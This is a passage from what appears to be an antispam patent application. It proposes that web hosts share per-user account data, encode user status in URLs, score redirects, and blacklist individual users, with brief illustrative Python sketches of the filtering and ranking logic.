o. For the page G, when was it first accessed after the most recent change? Different from the previous item: a spammer could write a page, and even though it is accessible, that does not mean anyone visits it, until perhaps the spammer sends out spam with links to G. As with the previous item, the older this date, presumably the more benign the page. Now if the host publishes this item about G, the spammer might try to game it by simply accessing the page herself after she has changed it. To mitigate this, the host might exclude accesses from network neighborhoods around the most recent network addresses that the user came in from.
p. For the page G, any "votes" about it that the host has received. Where a negative vote is a complaint, and a positive vote is an affirmation by someone that G is okay. This item is analogous to (b), but it is just about G.
For items (e-g), when we say "links", these can be the usual outgoing links, or incoming links (like loading an image). Also, we include the case of the destination that is used when an HTML "submit" button (or its functional equivalent in any other hypertext language) is pressed. This action is usually done when the user has typed information into a form on that page, and then wants to upload it. Some of the above information could be found by spidering a user's pages; the number of pages, for instance. But having the information readily available is more efficient in terms of network traffic and computation, both at the ISP and at the web host. Because if the ISP has to do a full spidering of the pages, then this also involves more effort by the web host's server. One possible format for the extended f() reply is sketched below.
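One possible shape for the reply of this generalized f() is sketched below. Every field name is a hypothetical rendering of some of the items (a)-(p) above; a real host would choose its own schema, likely in XML.

```python
# Illustrative reply only; no host is known to publish this exact format.
example_reply = {
    "user": "Zoltan",
    "account_status": "FREE",           # item (a): FREE | PAID | VERIFIED
    "complaints": 14,                   # item (b)
    "account_created": "2005-11-02",    # item (c)
    "page_count": 1,                    # item (d)
    "links_to_blacklisted": True,       # item (e)
    "links_to_phish_targets": False,    # item (f)
    "dynamic_addresses": True,          # item (g)
    "uses_https": False,                # item (h)
    "page_last_changed": "2005-12-20",  # item (n)
    "page_votes": {"positive": 0, "negative": 9},   # item (p)
}
```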
The ISP can use the above information to help classify the messages pointing to the user's pages. Our methods from the Antispam Provisionals involve the finding of a Bulk Message Envelope (BME). These objectively can find the BMEs with the most messages. There remains the question of whether such a BME, though it has many messages, is to be considered "good" bulk or "bad" bulk. (Good bulk might be newsletters that recipients subscribe to.)
The above information can be used as extra "styles" ["1174"] or heuristics to help in this determination. For example, if the user has a verified account, then the messages linking to her pages might be more likely to be good bulk than bad, compared to a user just having a paid or free account, other factors being equal.
It should be noted that currently, the above information is not released by most web hosts, if any. There is an analogy with email addresses. The large free email providers Hotmail and Yahoo also offer paid accounts. But given an arbitrary email address at either domain, there is no way for an outsider to tell if this is a free or paid account.
Let WH be a web host, with website wh.com. Why should it provide the above information? If it is serious about not tolerating spam, then it might be amenable. The above lets message providers give it feedback with assessments of its users. For example, if an ISP decided that a given user at WH is a spammer, it might communicate this to WH. To optimize bandwidth, the ISP might batch these results. Then it could periodically upload to WH a list of WH's users, as seen in the ISP's incoming messages. Next to each username could be information like the total number of messages seen with links to that user, and the number of these messages that the ISP considered to be spam. Implicitly, if there is a difference between these two numbers, then those other messages were not considered to be spam.
This is cooperative behavior by WH and an ISP. Both sides benefit, by closing an information loop. For example, when WH has a user who puts up her web pages, in general, WH has no idea how that user attracts visitors to her pages. Certainly, WH's web server has various statistics about where and when the user's visitors come from. But here, the "where" is just the network address of the visitors' browsers. Now suppose WH knows that for its user Zoltan, there were 20 000 emails received by an ISP, with links to Zoltan's pages. Note that this does not mean or require that there were 20 000 clickthroughs to WH. So even temporarily leaving aside the proportion of those 20 000 messages that the ISP considered to be spam, simply knowing that there were this many messages can be useful to WH. For example, WH might have some threshold value, such that a user with associated messages above that threshold will have his pages come under manual scrutiny.
Of course, if WH also uses the ISP data about what fraction of messages pointing to Zoltan are considered spam, then it has more information to act on.
It might be objected that WH telling the ISP about the complaints it has received about Zoltan's pages could be an infringement of Zoltan's privacy. But the complaints might be regarded as negative votes on those pages; akin to Amazon Corp.'s website, where you can read a review of a book and see how many positive or negative votes that review got. The comparison is especially appropriate since the reviews are on publicly accessible pages, and typically so too are most of the pages at WH. Plus, WH could in general modify its Terms of Service with its users, to expressly permit the above furnishing of information to third parties like ISPs. (This modification might need some advance notice in it, so that existing users have a reasonable amount of time to move if they object.) Ironically, this furnishing of information to others has taken on a bad taint, because some spammers have used such phrases to claim permission for wholesale reselling of their mailing lists to other spammers. But in our method, a major, if not exclusive, intent of this action is to fight spam at both web hosts and ISPs.
WH might also offer, on its web pages or via a Web Service, a means of searching its users, using constraints on the above variables as search criteria. For example, it could return links to those users whose free or paid accounts have existed for more than 60 days.
In turn, this leads to the possibility of a third party web site that aggregates users from different web hosting sites, analogous to how news feeds can be aggregated using RSS. Currently, any such user aggregation has to be done in an ad hoc fashion. But the use of the above Web Services can lead to an easier programmatic approach.
A merit of our method is that it attacks a technique of a spammer who opens an account at WH and writes pages, and who then injects spam into the network by various means, whose only connection to WH is in the enclosed links. The spammer takes advantage of the fact that WH and the ISP currently each sees only its own situation.
4. URL Encoding
Above, we mentioned how WH could have a Web Service that tells whether a user has a free, paid or verified account. Instead, or in addition, WH could also encode this in the URLs of a user's pages. So if Zoltan has a free account, his base URL might be http://wh.com/free/Zoltan, while if Mary has a paid account, her base URL might be http://wh.com/paid/Mary. In doing this, WH could reduce the bandwidth requirements on its Web Service, since the latter need no longer furnish such information. Another advantage is that this is analogous to our Notphish tag in "2528", if several web hosts use an agreed upon encoding, whose meaning can in turn be used at ISPs. The above URLs obey all the Internet rules for the valid format of an URL. Thus a user clicking on one of these only needs the standard behavior of a browser and web server to access the page that is linked to. This is just like how our Notphish tag is compatible with browsers, which merely ignore it when doing the visual layout of a page.
The potential advantages of the URL encoding go further. If WH is unable or unwilling, for whatever reason, to run a Web Service, then it could do this encoding. On the ISP side, it might permit a faster determination of the above style, directly from the URL, using the reasoning in the next paragraph.
Suppose Zoltan is a spammer, with his base URL given above. He cannot change this URL, even if he would prefer a "paid" or "verified" in it; because in general, there will be no pages at that URL if he does so, which means no clickthrough is possible from that link in his messages. Or even if, by coincidence, there is a http://wh.com/paid/Zoltan, this is to a different person's pages, and not to whatever "our" Zoltan is selling.
Of course, the choice here of {free, paid, verified} as the strings in the encoding uses English words. Our method applies if words in other languages are used, with the equivalent intent. Or if a numeric code was instead used. Or if there was some other change made in the URL with the same intent. For the latter, imagine perhaps WH offering the default HTTP port 80 for its free users' links, and another port for its paid users and another port for its verified users.
To WH, another possibly useful feature of this explicit labelling of a user's status is that it might be an incentive for its users to migrate from free accounts to paid accounts. The current situation where outsiders cannot tell if Zoltan is a free or paying user might be interpreted as Zoltan getting a free ride, vis-a-vis the paying users.
It might be objected: suppose a user opens a free account and writes some pages. The URLs to these will have a path prefix of "free/". Now she upgrades to a paid account, and has new URLs with a prefix of "paid/". But what if, when the account was free, she had promulgated the earlier URLs to others? For some period of time after the upgrade, WH can have an internal redirect from the old URLs to the new URLs. This can be done automatically by simple coding when a user upgrades.
Whether or not WH writes user information into the URLs, it can also publish a set of what we term "base labels". These labels mean that if a URL has a path that begins with one of these base labels, then it refers to a page published directly by WH itself, as opposed to its users. Imagine for example that the base labels are {info, home, help}. These demarcate directories of pages that are not written by the users. The base labels might be published as a Web Service and in a web page. It lets third parties programmatically distinguish between WH and its users.
The presence of the labels for a user's status in the URL also lets these be used in antispam measures that operate on messages containing the URLs. The measures might be performed at the message provider that receives the messages, or in the recipient's computer, as a client side filtering of spam. In either case, the user status in the URL can be used as an extra heuristic in assessing the message containing the URL. The recipient might even have a policy that such a message, pointing to a good web hosting site, goes into her bulk folder if it is from a free user, while if it is from a paid or verified user, it goes into her inbox. Here, both cases might be overridden by other filtering steps: if the sender is in her whitelist, then the message goes into her inbox, even if it points to a free user's URL; or if the message also has a link with a domain in a blacklist, then the message might go into the bulk folder, even if another link points to a verified user's URL at WH. Clearly, the interplay between the filtering rules might be complex. But the point is that knowledge of the user status gives us another handle on fighting spam. One possible ordering of such rules is sketched below.
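One possible ordering of such rules is sketched here; route_message() and its helper parameters are ours for the example, and an actual filter would tune the interplay.

```python
def route_message(sender, link_urls, whitelist, blacklist,
                  base_domain_of, status_of_url):
    """status_of_url() is assumed to read "free"/"paid"/"verified" from the
    URL path labels described above, or None if no label is present."""
    if sender in whitelist:
        return "inbox"                  # whitelist overrides the URL status
    if any(base_domain_of(u) in blacklist for u in link_urls):
        return "bulk"                   # a blacklisted link overrides "verified"
    statuses = {status_of_url(u) for u in link_urls}
    if statuses & {"paid", "verified"}:
        return "inbox"
    if "free" in statuses:
        return "bulk"
    return "inbox"
```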
The antispam steps in the previous paragraph might also be possible even if WH does not write the status of the user into the URL. If WH does publish a Web Service with this information, then a message provider can ask it for that information, and do the other steps suggested in the paragraph. This might also be possible at the recipient's computer, if her mail reading software accesses WH's Web Service.
5. Redirect
Given knowledge about a user associated with a page, styles can be defined if the page has a redirect. The redirect might be done via a META refresh tag. Or by other means such as JavaScript on the browser (client) side, or by server side actions, like a CGI script or Java that runs on the server. The ISP or other external party could load the page and detect the META refresh tag or JavaScript that would run in a browser. To detect server side actions, the ISP might choose to simulate a browser, to find the destination that the actions redirect to. Some web hosting sites might prevent their users from using some of the above mechanisms. For example, WH might restrict its users to writing HTML.
While the redirect mechanisms might vary, and new ones might emerge over time, the intent here is to detect a redirection, and not how that is achieved. The detection is not expected to be difficult, though below we discuss how the destination might possibly be obscured.
A redirect is important because, unlike clicking on a link, it does not involve the browser user's active intervention. This is sometimes used by a spammer to take the visitor away from the URL that ends at WH, to the spammer's actual website; or perhaps to another website with another redirect, et cetera, ultimately ending up at the true spammer's website. We stress that there are important real uses for redirects. But the presence of a redirect in any of a user's pages could set a Boolean style. Or the style might be an integer that counts up the number of the user's pages that have redirects. Or it could be a fraction that normalizes this number with respect to the total number of the user's pages. An important special case of the latter is where there is only one page for the user, and it redirects. This might be considered a special and potentially suspicious style.
Other redirect styles are possible. For example, does a redirect leave wh.com? If so, this might be considered more suspicious than a redirect that stays within the base domain. Thus, a Boolean style might be set here.
Suppose a redirect stays within wh.com. If it goes to a different user, then this might set a Boolean style, as contrasted to a redirect that stays within the user's files. Why might this be significant? There are at least two possible reasons. Firstly, the spammer might set up a main account, that has various pages (and perhaps code as well) selling some item. Then, she might set up other accounts, which redirect to the main account. The URLs of the former accounts are promulgated in spam. So if these are blacklisted, her main account might not be. The blacklisting might involve either a simple use of the domain+path, or a resolving down to the base domain + user name, as described in Section 6. And there is less effort for her compared to setting up the full pages on all her accounts.
Secondly, imagine that WH writes labels into the URLs, describing whether a user has a free, paid or verified account. The spammer might set up a paid account, with address http://wh.com/paid/Nick. Then, she sets up several free accounts, e.g. http://wh.com/free/Sue (etc), where these redirect to Nick. She does this for the reason in the previous paragraph. But here also, she wants the "paid" in the URL to be seen by the end user, as more authoritative than "free". She puts the free URLs into spam. Here, such a link might be <a href = "http://wh.com/free/Sue"> Cheap Meds </a>
The anchor text ("Cheap Meds") is visible when the recipient views the spam in a program like a browser that can show HTML. Now when she moves her mouse over the link, the bottom of the browser will show the URL. But some users ignore this. If she clicks on the link, it takes her to that URL. An immediate redirect happens, to http://wh.com/paid/Nick. This URL appears in the address bar at the top of the browser, and is far more prominent than a link transiently displayed at the bottom. So the recipient sees a page in a paid account.
If a redirect leads to another redirect et cetera, then this could set a Boolean style. Or an integer style that counts the number of steps in this chain.
Or if a redirect chain has one or more of the destinations being in a blacklist, then a Boolean style could be set. Or an integer style that counts the number of such destinations in the chain.
The previous three paragraphs referred to a single redirect in one of the user's pages. Other related styles could be defined, that count up these events, to the extent that they exist, across all the user's pages; a sketch appears below.
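A sketch of accumulating several of the above styles over one user's pages; detect_redirect() and base_domain_of() are assumed helpers.

```python
def redirect_styles(pages, detect_redirect, base_domain_of, host="wh.com"):
    """detect_redirect(page) is assumed to return the destination URL of any
    redirect found in the page (META refresh, script, etc.), else None."""
    n = len(pages)
    destinations = [d for d in (detect_redirect(p) for p in pages) if d]
    return {
        "has_redirect": bool(destinations),              # Boolean style
        "redirect_count": len(destinations),             # integer style
        "redirect_fraction": len(destinations) / n if n else 0.0,
        "single_page_redirect": n == 1 and len(destinations) == 1,
        "leaves_host": any(base_domain_of(d) != host for d in destinations),
    }
```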
The styles could also be associated with the destination domains. Giving extra information to help classify those domains.
The above styles are associated with the user. But they could be "summed up" across all of WH's users, and the results associated with WH. In this way, metrics could be obtained for each web hosting site. Perhaps to quantify the amount of suspicious activity across the different sites. This might be used as part of a quantitative reputation of each site.
There might be other redirect styles specific to a site. Like, does the site let a user write a redirect? If so, can she redirect outside the site? If so, does the site filter these redirects against a blacklist? So that an attempt by a user to write a page with such a redirect is rejected, and the page never appears on the Web. Does the site also filter redirects against a whitelist?
If the user can redirect, can she just have a redirect page?
If the user can redirect, does the redirect fail? Perhaps because the destination was taken offline. Maybe it was at another hosting site, and that site received complaints from others, sufficient for it to remove that page. Or the destination was a spammer domain, and its upstream network provider terminated its access for a similar reason. The setting of this style might be taken as a possible negative about the user. (Though by itself, it is not conclusive.)
An elaboration on these styles is if they are restricted to subsets of the users. For example, does the site permit redirects, but only from paid or verified users? These styles might also be considered policies of the site. Hence, sites can be compared for the strictness of their policies. Plus, of course, if they adhere to these. This itself can be a useful style.
If the user can redirect, is she able to write the destination as the output of a scripting routine, which might be computed by the browser? If she is a spammer, she might do this, in order to hide the destination from a simple filtering that just looks for a fixed string. In "1698", we discussed this in the context of an electronic message with what we called a "dynamic hyperlink" in the message body. Here, we have a web page instead of a message. And we do not have a hyperlink, since it is a key characteristic of a redirect that no special browser user action is done to invoke it, unlike clicking a hyperlink. But fundamentally, the idea is the same. The spammer wants to tell the browser to go to another location on the network. And she wants to avoid a blacklist method that looks for a static address of that location and compares it against the blacklist. Here, potentially, this blacklisting might be done by the hosting site or by a browser that has this ability. So she might use the same idea as "1698", of hiding the destination in a routine.
It might be that technically this is not possible to do with redirects, given the languages in which she might write routines that can be put into a page, and which can be run by a browser. If so, then the previous paragraph is moot. But if it is technically possible, then it is useful to know if the site forbids the writing of such a routine. If so, does the site just have it as a policy, and expect its users to adhere? Or does it have a parsing filter, that checks a user's submission of a web page for this dynamic addressing? Running this filter could be a more positive factor, when assessing the site. Note that the filter does not need to actually compute the destination from such a routine. It could merely check for the presence of the appropriate command in the page that invokes the routine. A simple objective test.
But if the site allows dynamic addressing of redirects, then does it check these against a blacklist or whitelist? Here, the site can use the ideas in "1698" to run master-slave threads that call the routine, in order to find the address. The slave does the computation, but the master will terminate the slave if it does not end within some given time. This avoids the possibility that a spammer submits a page with a routine that deliberately takes a long (or infinite) time. She is trying to stop the site from scrutinizing the dynamic addressing. So that even though that particular account of hers might be deleted because of this, the long run time endured by the site to find this out is meant to deter the site from doing this as a general practice, letting her make another account with dynamic addressing. Our method in "1698" avoids this trap.
An external entity like an ISP, or even a browser, can also apply this anti-dynamic addressing method against a redirect, if the routine exists in code that is downloaded to a browser. These styles or policies can also be used as additional criteria for determining if a given web hosting site will be admitted to the set of good sites, H, or kept in it.
6. Adding User to a Blacklist Entry
Suppose we, the ISP, now have found from WH the names of various users. Then, the canonical steps of the Antispam Provisionals can be modified. When a BME has a list of domains, D, from links in its messages, then D might also include the users. So, from the examples above, a BME might have a domain entry "wh.com/Zoltan", and another BME might have a domain entry "wh.com/Mary". This notation is arbitrary, but we choose it as one example, and its meaning is meant to be obvious. The use of the forward slash, "/", is optional but conforms to standard URL notation.
Hence, if WH is in the set H of major web hosts, then wh.com is not put into a blacklist. But we might instead put wh.com/Zoltan into the blacklist.
By this simple extension of the blacklist idea, we can use the analysis methods developed in our Antispam and Antiphishing Provisionals that were applied to the metadata space of domains. In those methods, a given entry in the earlier idea of a blacklist was an atomic entity, inasmuch as it was treated as a datum with no internal structure. Hence, the extension of a blacklist in this Invention lets those methods be used unchanged, or with trivial changes; a sketch appears below.
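A sketch of the point just made follows: the generalized entry is still an atomic string, so existing lookup code is unchanged. The entries and helper names are illustrative.

```python
blacklist = {"badguy.example", "wh.com/Zoltan"}   # illustrative entries

def blacklist_key(url, H, base_domain, user_of):
    """Reduce a URL to the blacklist key: base domain alone, or, for hosts
    in H, base domain + "/" + user, using f(G)=U from Section 2."""
    base = base_domain(url)
    if base in H:
        user = user_of(url)
        return "%s/%s" % (base, user) if user else base
    return base

def is_blacklisted(url, H, base_domain, user_of):
    # The key is an opaque string, just as a bare domain was before.
    return blacklist_key(url, H, base_domain, user_of) in blacklist
```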
For example, we can see if templating occurs: when we reduce a message to its canonical form and make hashes, we find that it is an instance of an existing BME, but the current message has a base domain, from a link, that is not in the BME's list of domains. We call it templating because the spammer is using a base version of the message as a template, and inserting different domains into the links. Now, we can also look to see if the spammer is using different user accounts at a given web host, or maybe different accounts at different web hosts, based on messages received by us. Plus, we can also spider the various links, and apply our canonical steps to the web pages pointed to, out to some n-ball in link space.
This lets us (the ISP) be a powerful aid to WH, by pointing out associations between ostensibly different users. Or with users at other web hosts, or with other domains.
Given this extension of a blacklist entry, antispam methods not described in our Antispam or Antiphishing Provisionals could also be used.
7. Aggregation Center
In our Antiphishing Provisionals we defined and used the idea of an Aggregation Center (Agg) that would be a central point for banks and other large companies to send their Partner Lists and other associated data to. The Agg then downloads these to users' browsers, which have a toolbar or extension that can apply this information to web pages or messages in the browser.
The Agg can also be used in this Invention. Earlier, we described how an ISP could decide the composition of a list, H, of major web hosts. It would then obtain f() from each web host. An alternative is for the Agg to do these tasks, and then furnish this to its customer ISPs. (Or, an antispam vendor might furnish the equivalent software and data to ISPs.) The Agg is well suited to maintain H and its associated information. For example, complaints by ISPs about users in a given company in H might be amassed by the Agg and then forwarded to that company. This could be useful from the company's vantage. Because instead of dealing with many ISPs, and perhaps wondering if some might have been subverted and are then sending it spurious complaints, it delegates to the Agg the problem of filtering the complaints.
The maintenance could include deciding what web hosts will be in H, and whether to keep a given host in H. For the latter host, suppose it is WH. The situation might arise if WH takes too long to respond to complaints from the Agg about its users. What "too long" means might be defined by the Agg. So that a web host which is put into H might agree to respond within this time, as part of the condition for it to belong in H. It should be appreciated that there is value for WH to be in a widely used H.
The Agg might compute various metrics about each host in H. Like the number of complaints it gets from its ISPs about each host's users. Or the number of each host's users that are complained out (removed after complaints). Or the average time between the Agg complaining to a host about one of its users and that user being taken offline. Also, if a host furnishes status information about its users, like whether they are free, paid or verified, then the Agg can total up complaints for users in each category. So that, for example, if WH has many verified users that are complained about, it suggests that WH's verification methods might need improvement. A sketch of such metrics appears below.
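A sketch of such per-host metrics follows; the record layout is assumed for the example.

```python
from collections import defaultdict

def host_metrics(complaints):
    """complaints: list of (host, user, complained_at, removed_at) records,
    with removed_at None if the user is still online; dates are datetimes."""
    totals = defaultdict(int)
    users = defaultdict(set)
    delays = defaultdict(list)
    for host, user, complained_at, removed_at in complaints:
        totals[host] += 1
        users[host].add(user)
        if removed_at is not None:
            delays[host].append((removed_at - complained_at).days)
    return {h: {"complaints": totals[h],
                "users_complained_about": len(users[h]),
                "avg_days_to_removal": (sum(delays[h]) / len(delays[h]))
                                       if delays[h] else None}
            for h in totals}
```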
From the above, it can be seen that the Agg can act as a known, trusted intermediary, standing between the web hosts of H and ISPs and other message providers.
Earlier, we said that H is expected to be of small size. In part, because if each ISP has to maintain its own, a small H is less effort. However, if Agg maintains H, then it may be cost effective for it to have a larger H, since it can essentially amortize this effort over a base of many ISPs.
The Agg can offer a service to the web hosts in H. It can certify that a given web host is in H. So the Agg is attesting that members of H perhaps follow certain good practises, where these might be defined by the Agg, as a prerequisite for membership (and continued membership) in H. So it might offer WH an image that WH could show on some of its pages, where this image is a "seal" attesting to validation by the Agg. The seal might also be clickable, going to the Agg's website, where data is then shown about WH's qualifications. However, while this could be done, it is well known that seals have disadvantages. They can be copied by spammers. And if a real seal is clickable, so too might be the fake seal; where the fake either goes to another spam page, or even to the Agg's website. In either case, the spammer hopes that most users will not bother to click the fake seal. However, if a browser has the extension described in ["2245", "2458", "2528"], then the Agg can offer a stronger measure. The extension could validate that a given web site which the browser is at is actually in H. Plus, if it finds links to the validation pages at the Agg, at pages not in H, then the browser could indicate this to its user, perhaps by a visual cue that says the page is a fake.
The Agg can also offer a service to users at web hosts. By various means, it might offer some validation of a user's identity or reputation, possibly in conjunction with a validation of the user's web pages. Imagine such a user, Jane, at WH, with her web pages beginning with http://wh.com/jane/. In those pages, Jane could have a tag that points to the Agg. So that a visitor can ask the Agg what it vouches for her. Plus, in her URLs, there might be the equivalent information, encoded in some fashion. In general, WH controls the format of URLs pointing to its pages, and it could permit this encoding. Hence, even if WH were not to offer the information about Jane described in Section 3, this encoding would let her offer others some assurance about her and her web pages.
There are now 3 states for a user: unvalid, valid and invalid. Unvalid is the default, for a user that has not been validated, and who does not have "bad" pages which might cause her to be invalid in the Agg's assessment.
The validation of a user need not be confined to users with pages in H. Though the Agg might refuse to validate any users on a website, if that site fails to meet standards imposed by the Agg. This acts against a minor web hosting site being conducive to spammers; a spammer might deliberately set up several "users" with benign pages, and get these validated by the Agg, to try to enhance the overall reputation of the site, and then proceed to issue spam linking to other users at the site. As discussed above with the validation of an entire website in H, when validating one user's pages, the Agg might offer the user a validation seal to put in her pages. This might (or perhaps should) be clickable, reaching to the Agg. Whereupon, there might be an Agg page with information about the user. Plus, if the browser has the above extension, then it might validate the user's pages in a manner that is external to the pages.
For both a website and a user, there could be different levels of validation offered by the Agg. There might be a strictly algorithmic validation. Then there could be a higher level of validation, which performs the previous validation and also involves some manual steps on the part of the Agg's employees and possibly also of the website's employees or of the user. The Agg could impose a higher fee for the latter validation, compared to the former.
A user might have accounts on several hosting sites, and the Agg could offer to validate these, all under the rubric of the same user. The Agg could have some steps to verify that the same person controls these accounts.
Above, when we described validating a user, this could be either a person or a group of persons or an organization.
The Agg validating a user or website might be useful to either. For example, a validated user might be able to obtain a higher commission for clickable ads that are placed in her pages. Perhaps on the probability that her pages are more likely to be credible. Or messages linking to her pages might be less likely to be treated as spam by various antispam methods that can identify that she is validated.
If the Agg were to invalidate a user or website, then this might be for two reasons. One is if the certification is paid for by the user or website, and the period for which this is valid has expired, and no payment has been received for another period. Another reason could be that through its analysis of the pages, or from external input, the Agg finds that the user or website should not be validated. The first reason might be considered more benign than the second.
If it is a user that is now invalid, the Agg might inform her website/s.
If the invalidation is for the second reason and for a user, the Agg might search its data for other users with pages canonically identical to the now invalid pages, and possibly invalidate those users, and inform their websites. Plus, the Agg might inform various ISPs and message providers that are its customers, updating their blacklists with this new entry for the invalid user.
Care has to be taken here. If a user is invalidated for the second reason, and because certain of her pages are considered invalid, then the search for other users with canonically identical pages might only be done for the invalid pages. Since the user might deliberately have benign pages.
Along these lines, if the Agg validates a user that was earlier invalid, then it might inform its ISP customers, suggesting that they remove the user from their blacklists.
8. Blog Sites
So far, we have mostly considered the case where a link goes from an electronic message to a page at WH. It is also possible that the link is in a web page, where, in general, this is at another domain, R. So R could be another web hosting site. R can also do the above analysis, in order to protect visitors to its pages from spam. It might already have a conventional blacklist consisting strictly of domains, which it applies to its pages. This can be extended as above to now include entries at web hosts, with user information. An important case is where R is a blog site. Blog sites have been facing increasing problems with manual and robot attacks that write "messages" which are spam, with links to spammers' pages elsewhere on the web.
9. Search Engine
A search engine could also benefit from the extra information made available by a web hosting site. Suppose the engine can access the information from the Web Service of WH. Then for a given web page, the engine knows if the author is a free, paid or verified customer of WH. And possibly the number of complaints made against the page. And how long the account has existed. Each engine has its own methods of ranking pages. This new information might be used to refine the rankings. For example, a page by a paid user might have a slightly higher weighting than a page by a free user, other factors being equal. Or, if WH used labels in its URLs, as suggested above, then the engine could use these.
Consider the user Zoltan with webpages at WH, and imagine that these are prefixed by the URL http://wh.com/Zoltan/. Here, we have depicted WH as not writing extra information in the URL as discussed above. But our method here also applies if that is done.
In general, Zoltan has a hierarchy of pages, in various directories and subdirectories of the above URL. The engine spiders these pages and wants to compute weightings. Suppose a particular directory, cheapPills/, and its pages, are linked to by various pages outside wh.com. Then, the engine might in turn look at the links to those pages and by various computations, use the data to derive a weight for that directory or its pages. Thus far, this might be what the engine normally does.
Now suppose Zoltan has another directory, at the same level as cheapPills, but called gamble/. In turn, the engine could use its normal methods to weight this. But suppose the engine also knows, or is informed by the Agg, say, that gamble/ is linked to by spam. Hence the engine might lower the weight of gamble/. But, and this is the important point, now that it knows that gamble/ and cheapPills/ are associated with the same user, it could make a decision to also lower the weight of the latter, and any other directories of Zoltan's that are not contained in gamble/.
Currently, when the engine analyzes the pages of WH, some might be by users who have nothing to do with spam, and some are by spammers. Our method lets it treat these differently. Now, the above example was made deliberately simple. The Zoltan parent directory had two subdirectories. But in general, outside this Invention, the engine might not know of the concept of a user and which pages belong to a user, at a typical web hosting site. The engine uses the general URL notation, across all types of web sites. However, if it can find this mapping, f(URL) --> user, for a major web hosting site, whether from a Web Service, or from the engine's own coded logic, that was perhaps derived from manual scrutiny of the web site, then it can refine its weighting of the site's pages. This is an example of using data from different Electronic Communication Modalities (ECMs) ["0046"] like email or SMS.
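To make this concrete, here is a minimal sketch, in Python, of how an engine might use such a mapping to propagate a penalty across one user's pages. The URL format and the penalty factor are hypothetical stand-ins; a real engine would use the f() published by WH or obtained via the Agg.

```python
from urllib.parse import urlparse

def user_of(url):
    # Hypothetical f(URL) -> user for wh.com, where the first path
    # component names the owning user, e.g. http://wh.com/Zoltan/...
    parts = urlparse(url)
    if parts.netloc != "wh.com":
        return None  # the mapping is only known for this host
    path = [p for p in parts.path.split("/") if p]
    return path[0] if path else None

def penalize_user_pages(weights, flagged_url, factor=0.5):
    # If one URL of a user is found to be linked to by spam, scale
    # down the weights of every page owned by the same user.
    owner = user_of(flagged_url)
    if owner is None:
        return weights
    return {url: (w * factor if user_of(url) == owner else w)
            for url, w in weights.items()}

weights = {
    "http://wh.com/Zoltan/gamble/index.html": 0.9,
    "http://wh.com/Zoltan/cheapPills/index.html": 0.8,
    "http://wh.com/Laura/knitting/index.html": 0.7,
}
weights = penalize_user_pages(weights, "http://wh.com/Zoltan/gamble/index.html")
# Zoltan's cheapPills/ page is also penalized; Laura's page is untouched.
```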
Likewise, if the engine finds that Zoltan is a new user, less than 60 days, say, then it can lower the weights on his files.
Consider also a user at WH who is not a spammer. Most users have a finite set of interests, as seen in their pages. The engine wants to make its search results more relevant to its users. This is a very hard problem. At a major website like WH, the users span all kinds of interests. But if the engine can associate a set of pages with the WH user Laura, say, then it might be able to refine its classification of those pages. From word extraction from a page, the engine tries programmatically to have some idea what the page is about. But human languages have ambiguities. Imagine that Laura has a subset of pages that are about one subject. And she has other pages that are somewhat ambiguous. In a stochastic sense, the engine might associate the second set with the subject of the first set.
Another way of considering this task is as follows. A search engine often wants metadata about a web page, because that data can guide its composing of results. The problem is that it is impractical for the engine to generate much, if any, of this manually. (That is, by the employees of the search engine company.) Our method lets metadata come from analysis of other pages that are in the neighborhood of a page, where the neighborhood is defined by a user.
The engine can also take this to a higher level. Across the users at WH, and across users at other websites, the engine can also search for similarities between users with a same interest. Possibly the engine is already doing this, but only by comparing between pages, or between domains. Our method gives an intermediate level of grouping of pages that may prove to be useful.
In the above, it might be asked, why might Zoltan have a directory that his spam points to, and a directory that other pages link to? Perhaps because he may have several modes of income. One is from sending spam that points to a directory. Another might be by artificially boosting the search rankings of the other directory. So that if a user of the search engine makes a particular query, then Zoltan's latter directory (or pages therein) would appear in the free results.
This "Search Engine Optimization" might involve techniques disapproved of by the engine. Especially if Zoltan is part of a link farm that tries to boost the rankings of pages that it heavily links to. Search engines already have various means of trying to find link farms. In this Invention, by applying the concept of a user and the pages owned by the user, at a web hosting site, we offer another means of finding a farm.
Another example that also illustrates this is as follows. Zoltan has a directory, gamble/, linked to from spam. But now his other directory, cheapPills/, has links to directories at other websites. It is functioning as a source of links, within a link farm. The search engine finds out, as above, about the spam links to gamble/. Then, because it has the knowledge of Zoltan as a user, it could use this as a heuristic to be applied against the weightings of cheapPills/ and its files, as a possible member of a link farm. Plus, by following the outgoing links from cheapPills, it can try to trace out other members of the link farm.
Of course, if Zoltan has a directory linked to by spam, another directory with outgoing links, and another directory that is linked to from outside, where the latter 2 directories are possibly part of a link farm, then the steps described above can also be applied here. Ditto if the directories are not "cleanly" separate, but are admixtures of those cases.
We have used the concept of a user or owner of web pages and shown how it can be useful to a search engine. But the analysis can be taken further. A link farm, that is distributed across several websites, can be considered to be a group of (undesirable) users. To the extent that a link farm has members on a web hosting site, the above showed how it can be searched for, using another ECM space of electronic messaging. In addition, the space of users browsing on the web can also be used.
Imagine a toolbar or special program that is distributed to many users. It records which websites a browser visits. Periodically, this data is uploaded to the organization ("Phi") that distributed the program. For privacy considerations, imagine that Phi removes all personally identifying aspects in the data. Phi is interested in the aggregate nature of the data, which correlates websites in a manner that might not be discernible from a static view of pages and links. Conceptually, Phi is looking for a mapping f({set of URLs}) --> spammer, where the latter can be considered to be one bad "user". This might not necessarily be a link farm.
The correlation between a browser visiting one web site and then another might arise because of spam sent to that user, with links to both sites. Earlier, we discussed an ISP finding such messages, possibly using our Antispam Provisionals. But a given ISP or a group of ISPs might not be doing this. If the spammer sends messages to users at those ISPs, and not to others, then the implementers of this Invention have no access to that data. The use of Phi's browser data is an attempt to get around this lack of access.
An initial group of associated URLs can be investigated using our BME method of "0046". The URLs and pages linked to or from these, or some pages in the same domain as those URLs, might be reduced to BMEs. Then these are compared to see if any are the same or similar across different domains. The sameness or similarity could arise if the same person or group of persons is behind those addresses, and is using boilerplate phrasing on some pages. Here, if the URL is to a web hosting site, then the methods of this Invention can be applied to those pages at the site that are from the same user.
We stress that given the initial group of associated URLs, the steps in the previous paragraph can be performed computationally, with little or no manual intervention. Except possibly at the end, to deal with a set of URLs that is diagnosed to be a group. The function of the group need not necessarily be spammers or a link farm. But being able to find such groups is useful in classifying the entire set of associated pages. Akin to our clustering methods of "1745".
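As an illustration of how these steps can run without manual intervention, the following sketch reduces a page to a set of hashes and compares two such sets for sameness or similarity. The reduction shown is only a stand-in; the actual canonical steps are those of "0046".

```python
import hashlib
import re

def canonical_hashes(page_text, n_blocks=4):
    # Stand-in canonical reduction: drop markup and links, normalize
    # whitespace and case, then hash n roughly equal text blocks.
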